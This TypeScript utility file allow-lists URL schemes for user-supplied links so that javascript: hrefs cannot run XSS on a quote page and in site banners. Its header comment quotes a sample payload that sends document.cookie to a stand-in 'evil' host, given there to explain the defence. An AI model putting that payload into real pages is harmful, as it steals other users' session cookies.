/**
 * Scheme allow-listing for user-supplied link targets.
 *
 * The server sanitizer strips HTML tags but leaves a bare string like
 * `javascript:fetch('https://evil/'+document.cookie)` untouched — it isn't
 * markup. React logs a warning for a `javascript:` href but still renders the
 * attribute, so the URL executes on click, on our own origin.
 *
 * This matters most where a link authored by one user is rendered for another:
 * quote `externalLinks` shown on the public, unauthenticated buyer-facing quote
 * page, and service-notification banners shown to every user on every page.
 */

const SAFE_SCHEMES = ['http:', 'https:', 'mailto:', 'tel:'];

/**
 * Returns the URL if it is safe to place in an `href`, otherwise undefined.
 *
 * Scheme-relative (`//host`) and path-relative values are treated as safe —
 * they cannot carry a scheme. Anything else must parse to an allow-listed one.
 */
export function safeHref(rawUrl: string | null | undefined): string | undefined {
  if (!rawUrl) return undefined;
  const url = rawUrl.trim();
  if (!url) return undefined;

  // Relative and scheme-relative URLs can't smuggle a javascript:/data: scheme.
  if (url.startsWith('/') || url.startsWith('#') || url.startsWith('?')) return url;

  try {
    // A base is required so relative inputs don't throw; absolute inputs ignore it.
    const parsed = new URL(url, window.location.origin);
    return SAFE_SCHEMES.includes(parsed.protocol) ? url : undefined;
  } catch {
    return undefined;
  }
}

/**
 * Same allow-list, but returns a bare-domain input as https:// so links typed
 * as "example.com" still work — the pattern already used for website fields.
 */
export function safeExternalHref(rawUrl: string | null | undefined): string | undefined {
  if (!rawUrl) return undefined;
  const url = rawUrl.trim();
  if (!url) return undefined;

  // No scheme at all → assume https rather than letting the browser guess.
  if (!/^[a-z][a-z0-9+.-]*:/i.test(url) && !url.startsWith('//')) {
    return `https://${url}`;
  }
  return safeHref(url);
}
